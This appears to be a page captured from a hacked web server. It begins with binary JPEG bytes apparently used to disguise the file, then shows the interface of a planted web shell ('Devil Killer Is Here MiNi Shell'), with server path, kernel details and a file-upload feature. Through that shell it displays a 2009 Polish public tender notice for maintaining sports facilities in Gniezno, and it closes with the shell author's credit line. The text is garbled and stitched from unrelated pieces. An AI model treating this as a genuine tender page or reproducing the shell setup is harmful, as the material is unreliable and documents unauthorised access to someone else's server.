JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090102/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090102/208-N-2009.html

<p class="kh_header"><b>Gniezno: Przedmiot zamówienia stanowi bieżące utrzymanie obiektów sportowych Gnieźnieńskiego   		    Ośrodka Sportu i Rekreacji:
Zadanie I:  Stadion Miejskim MIESZKO ul. Strumykowa 8 oraz boiska treningowe 2 szt: 
płyta boiska - klepisko
teren boiska ze sztuczną nawierzchnią ograniczony ogrodzeniem ORLIK 2012
Zadanie II: Obiekty sportowe przy ul. Paczkowskiego 5, ul. Bł. Jolenty 5, ul. Cymsa
Zadanie III: Obiekt sportowy ul. Wrzesińska  Stadion START</b><br>
<b>Numer ogłoszenia: 208 - 2009; data zamieszczenia: 02.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gnieźnieński Ośrodek Sportu i Rekreacji , ul. Bł. Jolenty 5, 62-200 Gniezno, woj. wielkopolskie, tel. 0-61 424 86 00, faks 0-61 424 86 01.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gosir.gniezno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: zakład budżetowy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiot zamówienia stanowi bieżące utrzymanie obiektów sportowych Gnieźnieńskiego   		    Ośrodka Sportu i Rekreacji:
Zadanie I:  Stadion Miejskim MIESZKO ul. Strumykowa 8 oraz boiska treningowe 2 szt: 
płyta boiska - klepisko
teren boiska ze sztuczną nawierzchnią ograniczony ogrodzeniem ORLIK 2012
Zadanie II: Obiekty sportowe przy ul. Paczkowskiego 5, ul. Bł. Jolenty 5, ul. Cymsa
Zadanie III: Obiekt sportowy ul. Wrzesińska  Stadion START.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres rzeczowy zamówienia

Zamawiający: Gnieźnieński Ośrodek Sportu i Rekreacji
Przedmiot zamówienia: Bieżące utrzymanie obiektów sportowych GOSiR na terenie miasta Gniezna

Zadanie nr 1
Bieżące utrzymanie obiektów sportowych GOSiR - ul. Strumykowa

Zakres terenów objętych obsługą.
	A. Stadion główny - płyta główna z terenem ograniczonym ogrodzeniem wewnętrznym 
	B. Boiska treningowe - szt 2
     - płyta boiska - klepisko 
     - teren boisk ze sztuczną nawierzchnią ograniczony ogrodzeniem. ORLIK
C. Kasy biletowe -  4 szt
D. W.C  ogólnodostępne z szatniami.- 1 szt.
E. Korona stadionu od trybuny do ogrodzenia zewnętrznego oraz trybuna od ogrodzenia    
             wewnętrznego do korony stadionu

Zakres prac do realizacji.
    1.  Pielęgnacja i utrzymanie terenów 
murawy stadionu i zakoli za bramkami wraz z terenem ograniczonym ogrodzeniem wewnętrznym, w tym bieżni wokół boiska i pasów zieleni
boisk treningowych i pasów zieleni w obrębie boisk treningowych.
prace pielęgnacyjne na murawie stadionu: nawadnianie wg potrzeb, koszenie minimum 2 razy w tygodniu, wałowanie przynajmniej raz w miesiącu, włókowanie wg potrzeb, wertykulacja (przełom marca-kwietnia, lipiec i wrzesień), piaskowanie - 80 ton żwiru (przełom marca-kwietnia, wrzesień), aeracja (przełom marca-kwietnia, czerwiec, sierpień), dosiew trawy (przełom marca-kwietnia), ręczny dosiew w miejscach ubytków trawy zaraz po każdym meczu, darniowanie pól bramkowych (przełom marca-kwietnia), stosowanie nawozów chemicznych (przełom marca-kwietnia, czerwiec, lipiec, sierpień, październik), oprysk chemiczny (maj)
przygotowanie murawy stadionu i boiska treningowego (klepisko) i teren boiska ze sztuczną nawierzchnią ORLIK do każdego treningu i meczu zgodnie z harmonogramem rozgrywek i treningów 
korony stadionu wraz z trybunami oraz pasów zieleni pomiędzy ogrodzeniem   zewnętrznym i wewnętrznym oraz pas zieleni ORLIKA
koszenie trawy na całej powierzchni w obrębie zewnętrznego ogrodzenia stadionów wraz z wywozem - wysokość trawy trawników nie może przekraczać 15 cm
formowanie krzewów i drzew zgodnie z wymogami prawidłowej pielęgnacji,  przycinanie krzewów, przekopanie i pielenie otulin (mis) krzewów i drzew, usuwanie odrostów drzew, przycinanie suchych gałęzi drzew, usuwanie wiatrołomów i suchych drzew,  (miejsca cięcia drzew należy zabezpieczyć) 

        2. Prace porządkowe:
utrzymanie czystości terenów objętych przedmiotem zamówienia wraz z wywozem śmieci
wygrabienie i wywóz liści.
przygotowanie W.C z szatniami do treningów i rozgrywek i bieżące utrzymanie,
bieżące utrzymanie 4 kas biletowych.
bieżące utrzymanie w czystości trybun 
ustawienie koszy na śmieci (ok.7 szt.) i opróżnianie koszy na bieżąco.

3.Dozorowanie terenów objętych zakresem rzeczowym zamówienia:
współdziałanie z Policją, Strażą Miejską i Strażą Pożarną w zakresie utrzymania porządku i bezpieczeństwa na dozorowanym terenie 
bieżące zimowe utrzymanie wewnętrznych alejek komunikacyjnych oraz przyległych do terenów chodników i dróg dojazdowych przez likwidację śliskości i usunięcie śniegu (szerokość odśnieżania min. 1,5 m ) 
Zadanie nr 2
Bieżące utrzymanie obiektów sportowych ul.  Paczkowskiego , ul. Bł. Jolenty,
ul. Konopnickiej.

Zakres terenów objętych obsługą.:
tereny zielone,
ciągi komunikacji pieszej i samochodowej

Zakres prac do realizacji.
1. pielęgnacja i utrzymanie terenu  w tym:
koszenie trawy wraz z wywozem trawy (wysokość trawy nie może przekraczać 15cm),
likwidacja chwastów jednorazowo na zlecenie,
formowanie krzewów i drzew, zgodnie z wymogami prawidłowej pielęgnacji , przycinanie krzewów, jednorazowe przekopanie i pielenie otulin (mis) krzewów i drzew, usuwanie odrostów drzew, przycinanie suchych gałęzi drzew, usuwanie wiatrołomów i suchych drzew,  (miejsca cięcia drzew należy zabezpieczyć)

2.   prace porządkowe w tym:
utrzymanie czystości terenu  objętego obsługą przez uprzątanie śmieci wraz z ich wywozem
wygrabienie i wywóz liści.

3.   dozorowanie terenu, w tym:
współdziałanie z Policją, Strażą Miejską i Strażą Pożarną w zakresie zapewnienia porządku i  bezpieczeństwa na dozorowanym terenie,
bieżące zimowe utrzymanie wewnętrznych dróg dojazdowych i przyległych do terenu chodników przez likwidację śliskości i usunięcie śniegu (szerokość odśnieżania min. 1,5 m ) .

Zadanie nr 3
Bieżące utrzymanie obiektów sportowych GOSiR - ul. Wrzesińska

Zakres terenów objętych obsługą.
A.Płyta trawiasta stadionu 
B. Kasy biletowe -   4szt
C. W.C  ogólnodostępne z szatniami.-  
D. Korona stadionu od trybuny do ogrodzenia zewnętrznego oraz trybuna od ogrodzenia    
             wewnętrznego do korony stadionu 
        E. trybuna kryta

Zakres prac do realizacji.
    1.  Pielęgnacja i utrzymanie terenów na polecenie zamawiającego w tym:
prace pielęgnacyjne na murawie stadionu: nawadnianie, koszenie, wałowanie, włókowanie, wertykulacja (przełom marca-kwietnia, lipiec i wrzesień), piaskowanie (przełom marca-kwietnia, wrzesień), aeracja (przełom marca-kwietnia, czerwiec, sierpień), dosiew trawy (przełom marca-kwietnia), stosowanie nawozów chemicznych  (przełom marca-kwietnia, czerwiec, lipiec, sierpień, październik), oprysk chemiczny  (maj) 
korony stadionu wraz z trybunami oraz pasów zieleni pomiędzy ogrodzeniem zewnętrznym i wewnętrznym,
koszenie trawy na całej powierzchni wraz z wywozem - wysokość trawy trawników nie może przekraczać 15 cm
formowanie  krzewów i drzew zgodnie z wymogami prawidłowej pielęgnacji, przycinanie krzewów, przekopanie i pielenie otulin (mis) krzewów i drzew, usuwanie odrostów drzew, przycinanie suchych gałęzi drzew, usuwanie wiatrołomów i suchych drzew,  (miejsca cięcia drzew należy zabezpieczyć) 

        2.  Prace porządkowe:
utrzymanie czystości terenów objętych zakresem wraz z wywozem śmieci
wygrabienie i wywóz liści.
przygotowanie W.C z szatniami do treningów i rozgrywek i bieżące utrzymanie,
bieżące utrzymanie 4 kas biletowych.
bieżące utrzymanie w czystości trybun 
ustawienie koszy na śmieci (ok.10 szt.) i opróżnianie koszy na bieżąco.

3.Dozorowanie terenu, w tym:
współdziałanie z Policją, Strażą Miejską i Strażą Pożarną w zakresie zapewnienia porządku i  bezpieczeństwa na dozorowanym terenie,
bieżące zimowe utrzymanie wewnętrznych dróg dojazdowych i przyległych do terenu chodników przez likwidację śliskości i usunięcie śniegu (szerokość odśnieżania min. 1,5 m ).</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 77.32.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Oferent przystępując do przetargu jest zobowiązany wnieść wadium w wysokości netto 
2 280,00,-zł (dwatysiącedwieścieosiemdziesiąt 00/100 złoty).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie może ubiegać się wykonawca który spełnia warunki udziału w postępowaniu wymienione w art. 22 ust.1 ustawy  Prawo zamówień publicznych, a w szczególności oświadcza, że:.
posiada uprawnienia do wykonania określonej działalności lub czynności jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
posiada niezbędną wiedzę i doświadczenie oraz dysponują potencjałem techniczny i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia:
znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
nie podlega wykluczeniu z postępowania o udziale zamówienia zgodnie a art.. 24 ustawy Prawo zamówień publicznych..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oferta winna zawierać:
Stronę tytułową, oznaczoną jako strona 1 oferty  (załącznik Nr 2) ze  wskazaniem: 
imienia i nazwiska, nazwy (Firmy) oraz adresu (siedziby) Oferenta,
przedmiotu zamówienia oraz ceny jego realizacji wyrażonej liczbowo i słownie kwotą wartości zamówienia netto i brutto (łącznie z podatkiem  VAT) za  zadanie. Jaśli przedmiot zamówienia opodatkowany jest różnymi stawkami podatku od towarów i usług wymagane jest wskazanie wartości dla każdej z poszczególnych stawek tego podatku. Zamawiający dopuszcza rozliczenie tylko w złotych (PLN) 
warunków płatności  ze wskazaniem:
 - terminu zapłaty należności za wykonanie przedmiotu zamówienia 21 dni, licząc od dnia dostarczenia  faktury z potwierdzeniem wykonania usługi bez zastrzeżeń przez upoważnionego/ych  przedstawicielai  Zamawiającego,
 - sposobem dokonania zapłaty.
Strona tytułowa winna być podpisana przez osobę (osoby) upoważnione do składania oświadczeń woli w imieniu Oferenta -  z pieczątką imienną i firmową Oferenta.
Pisemne oświadczenie o wiarygodności Oferenta na podstawie art.22 ust.1 i art.24, 
złożone na formularzu stanowiącym załącznik Nr 3 do Specyfikacji. W przypadku    	podmiotów występujących wspólnie, oświadczenie musi złożyć każdy z 			podmiotów. 
W celu potwierdzenia danych zawartych w oświadczeniu, Oferent jest zobowiązany złożyć następujące dokumenty wg Rozporządzenia Prezesa 	Rady Ministrów z dnia 	19 maja 2006 roku  (Dziennik Ustaw z 2006 r. Nr 87 poz. 605, ze zm. z 16 pażdziernika 	2008 r) 
aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o                      wpisie do ewidencji działalności gospodarczej, lub zgłoszenie do ewidencji działalności gospodarczej,  wystawione nie wcześniej niż 6 miesięcy przed upływem terminu  składania ofert;
aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz                    właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed  upływem terminu składania ofert;
aktualną informację z Krajowego Rejestru Karnego  w zakresie określonym w art. 24 ust.1 pkt.4-9 ustawy, wystawione nie wcześniej niż 6 miesięcy przed upływem składania ofert;
w przypadku podmiotów występujących wspólnie pełnomocnictwo z art.23 ust.2 ustawy Prawo zamówień publicznych;
wykaz osób, które będą wykonywać zamówienie wraz z informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia wraz z załączonym
dowodem posiadania wymaganych zgodnie z niniejszą specyfikacją kwalifikacji lub stażu,
dowodem posiadania uprawnień pilarza min. 1 pracownika;
wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń jakimi dysponuje lub będzie dysponował wykonawca;
pisemnego zobowiązania innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, jeśli w wykazie, o którym mowa w pkt. 3, wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował;
aktualne zezwolenie na prowadzenie działalności w zakresie zbierania i transportu odpadów w rozumieniu obowiązującej ustawy o odpadach;
potwierdzenie gotowości przejęcia odpadów przez przedsiębiorcę prowadzącego działalność w zakresie odzysku i unieszkodliwiania odpadów;
oświadczenie o podjęciu czynności interwencyjnych w ciągu 45 min. od momentu powiadomienia;
informację z banku, w którym wykonawca posiada podstawowy rachunek bankowy, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (wg załącznika Nr 4). Załącznik ten określa minimalne wymagane informacje i stanowi wzorzec. Zamawiający wyraża zgodę na składanie oświadczeń w innej formie, pod warunkiem zawarcia w nich wszystkich informacji przewidzianych w w/w załączniku i potwierdzonych przez bank prowadzący podstawowy rachunek bankowy wykonawcy; 
polisę lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, z sumą ubezpieczenie na kwotę conajmniej 50 000,00 zł.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.gosir.gniezno.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację  Istotnych Warunków Zamówienia można odebrać w GOSiR 
   ul Bł. Jolenty 5 , Sekretariat w godzinach 8.00- 15.00., lub pobrać ze strony 	www.gosir.gniezno.pl.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.01.2009 godzina 10:00, miejsce: Oferty należy składać w GOSiR ul. Bł. Jolenty 5 , w sekretariacie do dnia 15.01.2009 r, do godz. 10,00..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com